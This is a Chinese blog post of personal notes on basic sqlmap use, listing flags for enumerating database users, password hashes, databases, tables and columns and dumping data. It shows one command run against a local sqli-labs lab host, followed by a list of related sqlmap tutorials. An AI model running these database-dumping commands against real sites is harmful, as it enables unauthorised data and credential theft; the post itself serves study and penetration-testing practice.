sql注入——sqlmap的基础使用

已于 2023-04-23 23:08:24 修改
阅读量334 收藏
点赞数
分类专栏: hacker笔记 文章标签: sql mybatis 数据库
于 2023-04-21 15:58:29 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_64875725/article/details/130287632
版权

sqlmap简介:

      sqlmap是一个自动化sql注入工具,主要功能是发现并且利用给定URL进行SQL注入。

sqlmap常用参数: 

     -u "注入url"    #指定url

b9faeb47a658418cae7916d3fe3cf36f.png

    -m 文件名        #获取多个url

    -r  文件名         #从文件中获取http请求

1397b6857a304e4495ecb18a807043aa.png

    -l  文件名          #从日志文件中获取目标

0b4a13dd8ba24d3db3d387007e1ff8b7.png

 

     --users                     # 获取数据库用户

     --passwords               #获取数据库用户密码

     --current-user             #获取当前数据库用户名称

     --cookie    “”               #设置cookie

     --data                        #设置post请求参数

     -p

       --dbs              #获取数据库

199b8e9767544252a6b4eb8fc9b1bd54.png

从sqli/less-1获取到的服务器数据库列表。

ebf5cee2b18b409ab5e6a3de59aa53ba.png

-D  数据库                  #指定数据库

    --tables                      # 获取表

sqlmap -u http://192.168.1.121/sqli/less-1/?id=1 -D security --tables

685580858344444fa4c4dbbe2f645e2b.png

    -T 表名                     #指定表

    --columns                 #获取字段名

25f83b421ade46dbbc49d56ea3d04f78.png

 2bd0a8f659b74201a4ac202e19b40827.png

-C  字段                         #获取列名

     --dump                       #获取数据30e222d6792d47958d846b7c57023438.png

b59e4184afea44669abdfeb5d2598da3.png
 

 

Russ0West
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
详解强大的SQL注入工具——SQLMAP
05-09
这是一个审计数据库安全的SQL注入工具的使用指南, 该工具在windows平台与linux平台下均可以使用数据库管理员(DBA)可用它来检 验自己的数据库是否存在安全配置方面的漏洞。
网络安全 sql注入工具sqlmap使用
01-13
网络安全 sql注入 工具sqlmap使用
sqlmap基本使用方式(非常详细)零基础入门到精通,收藏这一篇就够了
最新发布
Javachichi的博客
03-13 1253
内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,由于内容的敏感性,我就不一一展示了。网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。会清空之前的session,重新测试该目标。
SQLMap常用的基础命令
任浩的博客
12-16 517
1、sqlmap -u[“url”]–dbs(获取数据库) 2、sqlmap -u["url]–db(获取数据库名称) 3、sqlmap -u[“url”]–current–user(获取数据库用户的名称) 4、sqlmap -u[“url”]–D(获取数据库名)–tables(列表名) 5、sqlmap -u[“url”]–D(获取数据库名)–T(表名)–columns(列出表名) 6、sqlmap -u[“url”]–D(获取数据库名)–T(表名)–C(列出字段名)–dump(列出字段内容) ...
利用sqlmap获取网站帐号密码
weixin_66945507的博客
04-27 4572
利用sqlmap获取网站后台帐号密码
详细:Sqlmap入门到进阶使用手册
qq_60115503的博客
04-13 4210
详细:Sqlmap入门到进阶使用手册 本文介绍sqlmap的原理到sqlmap入门使用到最后sqlmap进阶使用操作
sqlmap使用详解
weixin_59246157的博客
04-21 1598
id=1" -D security -T users -C username --dump --start 1 --stop 100 #爆出数据库security中的users表中的username列中的前100条数据。
SQLMap常用命令介绍
tcsnMFSheng的博客
08-05 751
sqlmap常用基本命令
SQLmap使用教程图文教程(超详细)
热门推荐
wangyuxiang946的博客
06-20 3万+
SQLmap是一款自动化SQL注入工具,kali自带。路径 /usr/share/sqlmap 一、目标 1、指定url 2、指定文件(批量检测) 3、指定数据库/表/字段 4、post请求 5、cookie注入 二、脱库 1、获取数据库 2、获取表 3、获取字段 4、获取字段类型 5、获取值(数据) 6、获取用户 7、获取主机名 8、搜索库、表、字段。 9、正在执行的SQL语句 三、WAF绕过
SQL注入+sqlmap使用
07-04
SQL注入+sqlmap使用SQL注入+sqlmap使用SQL注入+sqlmap使用
sql注入工具sqlmap
06-16
sqlmap是一个自动化的sql注入渗透工具,指纹检测、注入方式、注入成功后的取数据等等都是自动化的,甚至还提供了一个字典来将取回来的hash爆破,是ctf sql注入题的必备帮手
SQL注入sqlmap使用
06-13
SQL注入sqlmap使用,支持一下,谢谢,可以了解一下。
Web渗透-Sqlmap工具使用
m0_62630794的博客
01-25 3236
SQLMap 是一个自动化的SQL注入工具,其主要功能是扫描、发现并利用给定URLSQL注入漏洞,内置了很多绕过插件,支持的数据库是MySQL 、Oracle 、PostgreSQL 、Microsoft SQL Server、Microsoft Access 、IBM DB2, SQ Lite 、Firebird 、Sybase和SAPMaxDB。以上的查询是指定带参数的url,同样我们也可以从文本文件中获取HTTP请求,这样就可以不设置其他参数。–tables是查询指定数据库里面的表。
使用sqlmap执行SQL注入并获取数据库用户名
老徐的博客只有干货
03-18 2268
sqlmap支持MySQL, Oracle,PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird,Sybase和SAP MaxDB等数据库的各种安全漏洞检测。sqlmap支持五种不同的注入模式:基于布尔的盲注,即可以根据返回页面判断条件真假的注入;基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断;
SQLmap参数详解
Williamanddog的博客
01-19 5305
目标URL参数:-u或者--url 格式:http(s)://targeturl[:port]/[…] 例如:python sqlmap.py -u "从Burp或者WebScarab代理中获取日志 参数:-l 可以直接吧Burp proxy或者WebScarab proxy中的日志直接导出来交给sqlmap来一个一个检测是否有 注入。 从文本中获取多个目标扫描 参数:-m 文件中保存urlsqlmap会一个一个检测 从文件中加载HTTP请求 参数:-r。
SQLmap
qq_41638872的博客
06-23 1460
SQLmap使用
sqlmap基本使用
m0_55641973的博客
06-04 1440
-common-columns # 暴力破解字段, --common-tables # 暴力破解表。--users # 查询所有的数据库账号 --current-user # 查询当前数据库用户。--tables # 查看所有的表。--predict-output # 优化检测方法,不断比对大数据,缩小检测范围,提高效率。
SQLMap 渗透工具详细讲解
ju7ran的博客
05-11 1513
我们在学习 SQLMap 的时候,可以根据官网的介绍来了解 SQLMap 的功能。官网地址:https://sqlmap.org/进入官网,我们可以看到这张图片,类似一个小针头的图标,可能为了表达我是 SQL 注入……根据官网的介绍,我们可以了解到 SQLMap,是一种开源渗透测试工具,它可以自动化检测和利用 SQL 注入缺陷以及接管数据库服务器的过程。
sqlmap使用教程sql注入
08-17
为了防止任何非法行为和安全问题,我不能提供sqlmap的详细教程。sqlmap是一种用于检测和利用SQL注入漏洞的工具,它可以帮助安全测试人员或研究人员识别并利用存在于Web应用程序中的SQL注入漏洞。然而,使用sqlmap进行未经授权的测试是非法的,并且可能导致法律后果。如果您对SQL注入感兴趣,我建议您学习有关Web应用程序安全和SQL注入基础知识,并且仅在合法和道德的环境中使用这些技术。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [SQL注入sqlmap入门教程](https://blog.csdn.net/m0_56634355/article/details/124058943)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Russ0West

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值